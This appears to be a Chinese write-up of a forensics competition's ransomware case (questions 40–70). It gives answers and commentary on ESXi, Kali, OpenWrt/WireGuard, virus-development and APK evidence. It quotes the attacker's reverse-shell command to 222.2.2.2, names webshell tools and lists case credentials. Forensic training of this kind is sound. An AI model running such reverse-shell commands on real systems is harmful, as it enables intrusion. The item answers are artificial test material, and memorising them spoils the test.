背景介绍
某月某日,县公安局接某公司财务部门报警,称其官网及财务报销系统疑被入侵,且攻击者在财务报销系统中投放了勒索病毒,现已无法运行,且服务器内的重要文件均被加密。
县公安局网安大队高度重视,立即根据受害人的反馈对该被入侵服务器进行取证,初步确定了作案手法:这是一次来自互联网的网络攻击,攻击者利用多种漏洞获取到服务器的权限,并投放了勒索病毒对服务器进行加密,以勒索该公司。
案情梳理
官网和财务报销系统被入侵
攻击者在财务报销系统投放了勒索病毒
步骤:
1)来自互联网的网络攻击
2)多种漏洞得到服务器权限
3)投放勒索病毒加密
题目
前提
做题的方法肯定有很多种,每次我都是随性子用方法。也欢迎大家探讨。
检材三、四
在掌握攻击者的远程回连地址后,你们通过回连地址成功抓获了三名犯罪嫌疑人。
经过初步审讯,你们得知三名犯罪嫌疑人分别是王某、李某和丁某。在整个犯罪链条中,王某提供联系方式和密钥,由丁某编写病毒程序,再由李某寻找目标进行渗透并植入病毒,到手后按比例分成。
案件线索:
现对嫌疑人的服务器进行了取证,并分别制作了镜像,请对检材三(ESXI.E01)和检材四(ESXI_NFS.E01)进行分析,并回答以下问题。
(1)注意:对ESXi进行仿真时,请打开Vmware WorkStation中该虚拟机的Intel VT-x/EPT或AMD-V/RVI以打开嵌套虚拟化。
(2)注意:仿真时为保证网络可以访问,请直接修改Vmware Workstation中的NAT网段,而不要尝试修改虚拟机中的IP,以增加仿真成功概率
BUG:这个仿真起来还是有问题的,比如kali第一次没有界面化,第二次仿真就有了。
40、该虚拟化平台的后台登陆URL地址为?(100分)(参考格式:https://xxx.x.x.x/ui/#/login)
https://222.2.2.250/ui/#/login
41、该虚拟化平台的内部版本号为?(100分)
8169922
42、该虚拟化平台网络存储服务器通过NFS进行文件共享,该NFS的配置文件的位置为?(150分)(参考格式:/mnt/data)
/etc/exports
最开始可能不太熟悉NFS存储服务器,所以建议看一下我下边推荐的那篇文章,去了解一下它的流程
参考:
http://www.taodudu.cc/news/show-384291.html?action=onClick
43、该虚拟化平台网络存储服务器在虚拟化平台中的位置为?(200分)(参考格式:/vxx/vxxx/uxxx)
/vmfs/volumes/9af41fd8-941fbcd0
客观的进ESXi里面看看就好了
44、据嫌疑人王某供述,渗透测试机的密码存在于该虚拟机的备注中,该渗透测试机的账号、密码为?(100分)(参考格式:user/pass)
kali/kali
1)
2)
45、攻击者是使用什么软件获取到被入侵网站的Webshell的,请计算该软件的SHA256哈希值?(250分)(格式:大写)
68E38AFE28D9476145D4A1DCBBEA676F6B7FFABCEE076324CB59CDDC5FA5BEC5
最开始我误解了这道题的意思,所以以为答案是蚁剑,所以先做的46题。
也无意间知道了他把用的工具都放在了Download里面。
也发现他在历史命令里,最开始用的命令,除了蚁剑就是ThinkphpGUI,结合ThinkphpGUI的作用,明确ThinkphpGUI就是获取Webshell的工具。
官网:
再结合做检材一时候发现的peiqi.php
,明确就是它。
参考:
https://github.com/Lotus6/ThinkphpGUI
46、攻击者是利用什么软件对被入侵网站进行文件浏览、命令执行等操作的,请计算该软件的主程序(可执行文件)的SHA256哈希值?(250分)(格式:大写)
E4870DF2482D9907EFBDDB8FB6A09F8777E335E577263891D902BBBCCE1428F6
熟悉渗透的朋友应该知道,有一个工具叫蚁剑
我原本是在渗透机里面找了一圈,但是我发现没有
再看历史记录的时候,发现他好像删掉了,但是还有。。。。
然后我发现我大概是个傻子
47、该渗透测试机的网关IP是多少?(150分)
192.168.200.1
这里有一个注意的点:brodcast叫做广播地址,不是网关。
48、接上题,该渗透测试机曾接收过反弹shell,请分析该渗透测试机是通过何种方式接收到来自互联网的反弹shell的?(200分)(说明:提交前需联系考官核实)
端口映射
先来看他的反弹shell代码:
bash -i>& /dev/tcp/222.2.2.2/10000 >&1
是在检材一(WEB.E01)中,222.2.2.2是openwrt&wireguard服务器
再去看防火墙的地方:
49、哪一条命令是攻击者用于连接财务服务器?(200分)
rdesktop 106.55.48.5
财务服务器就是检材二(PC.E01),其IP地址为192.168.100.100
这里我把两个ESXi机器重新仿真了一遍,发现kali可以用界面了,应该是bug。
然后也随便翻了翻,看到桌面的文件:
发现做了端口映射。
PC.E01是Windows服务器,那么登陆的话,一般是使用rdesktop命令,搜了一下历史命令,发现以下:
然后用奇安信的威胁情报搜了一下这个网段,发现是腾讯云,因此只能猜测,这台主机在使用的时候,就是这个IP地址
验证方法:
可以查看历史命令的执行时间,来对应PC.E01被远程连接成功的时间,但是不知道为什么,我的无法查看时间:后续再说吧
export HISTTIMEFORMAT='%F %T'
source ~\.bashrc
history
知识分享:
ssh -CgfNR
-C
要求进行数据压缩 (包括 stdin, stdout, stderr 以及转发 X11 和 TCP/IP 连接 的数据). 压缩算法和 gzip(1) 的一样, 协议第一版中, 压缩级别 ``level 用 CompressionLevel 选项控制. 压缩技术在 modem 线路或其他慢速连接上很有用, 但是在高速网络上反而 可能降低速度. 可以在配置文件中对每个主机单独设定这个参数. 另见 Compression 选项.
-f
要求 在执行命令前退至后台. 它用于当 准备询问口令或密语, 但是用户希望它在后台进行. 该选项隐含了 -n 选项. 在远端机器上启动 X11 程序的推荐手法就是类似于 ssh -f host xterm 的命令.
-g
允许远端主机连接本地转发的端口.
-N
不执行远程命令. 用于转发端口. (仅限协议第二版)
-R port:host:hostport
将远程主机(服务器)的某个端口转发到本地端指定机器的指定端口. 工作原理是这样的, 远程主机上分配了一个 socket 侦听 port 端口, 一旦这个端口上有了连接, 该连接就经过安全通道转向出去, 同时本地主机和 host 的 hostport 端口建立连接. 可以在配置文件中指定端口的转发. 只有用 root 登录远程主机 才能转发特权端口. IPv6 地址用另一种格式说明: port/host/hostport
50、该openwrt&wireguard服务器的外网IP的后台管理地址为?(100分)(格式:http://10.10.1.1/test/)
http://222.2.2.2/cgi-bin/luci/
开启虚拟机后,在浏览器访问222.2.2.2会自动跳转到登录界面
51、该openwrt&wireguard服务器的内核版本为?(100分)(格式:3.1.1)
5.4.154
52、该openwrt&wireguard的之前配置过,现已禁用的DDNS域名地址为?(100分)
yourhost.esirplayground.org
53、攻击者和勒索病毒开发者是通过什么协议连入内网的,填协议名称?(200分)
WireGuard VPN
这道题只能是为了做题而做题。大概能从下边这个地方看出来。
53-55三道题,出得很没有里头,全程都没有说内网这个概念,从前面检材一检材二来看,都分别指的是192.168.100.0/24网段和192.168.200.0/24网段。我不知道哪冒出来的,不符合逻辑。
54、接上题,该服务开启在哪个端口号?(100分)(格式:8888)
12345
上题截图,有一个监听端口就是答案。
55、据嫌疑人丁某供述,他为了开发勒索病毒曾连入该内网,请问他连接该内网所使用的公钥为?(150分)
0DydALVvHHU1n+lHpVvaXqayllePKqsPRBbcVcBHLXE=
56、请分析,病毒研发机中的Chrome浏览器未删除的历史记录条数为?(150分)
278
这道题,有异议:
把病毒研发机启动起来,进入(密码是在翻kali文件的时候,偶然翻到的:honglian7001)
直接看是115:
取证分析软件看是278:
57、病毒开发者用于向gitlab提交代码的项目地址为?(150分)
http://192.168.200.201/zhaohong/vir_project.git
通过以下三个地方,可以确定:
58、接上题,病毒开发者访问gitlab的账号密码为?(150分)(格式:user/pass)
root/honglian7001
对照上一题的URL:
59、请分析该病毒研发机,找到启动网站(档案系统)的可执行程序名为?(100分)(格式:1.exe)
服务启动程序.exe
60、接上题,该档案系统的网站后台采用哪种框架技术?(150分)(格式:英文小写)
springboot
没什么技术含量:
61、接上题,该档案系统的Mysql数据库连接用户名、密码为?(200分)(格式:user/pass)
root/123456
找配置文件就对了:
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-vtbCncb3-1687657393971)(./image-20230618155144270.png)]
后边的题都是关于JADX逆向的,不会,不做。
62、接上题,该档案系统后台对于账号的密码采用加盐加密,使用加密算法为?(250分)(参考格式大写:RSA)
MD5
63、接上题,在档案系统中找出财务公司被盗取的文件数量为?(250分)(格式:数字)
2
64、接上题,请在档案系统中找到 “zhaohong” 用户所使用的APPID为多少
zhaohong_honglian
65、据王某交代,解密密钥存在其手机的一个APP中,请尝试找出该APP,并给出其包名?(100分)
demo.honglian
66、请分析并提取加密钱包地址,该地址在2022-05-06 12:58:49完成一次交易,交易hash值为多少?(格式:小写)(150分)
honglian
67.该手机涉案QQ账号为?(250)
2678440406
重要提醒:为防止作弊,68题-70题在提交答案前,参赛人员需主动举手向工作6人员展示解题过程后方可提交,否则不得分。工作人员只负责核实解题过程是否真实,不负责答案是否准确。
68、该涉案APK的登陆用户名为?(100分)
69、该APK的登陆密码加密方式为?(150分)(格式:英文小写)
base64
70、该APK的登陆密码明文为?(150分)
123456honglian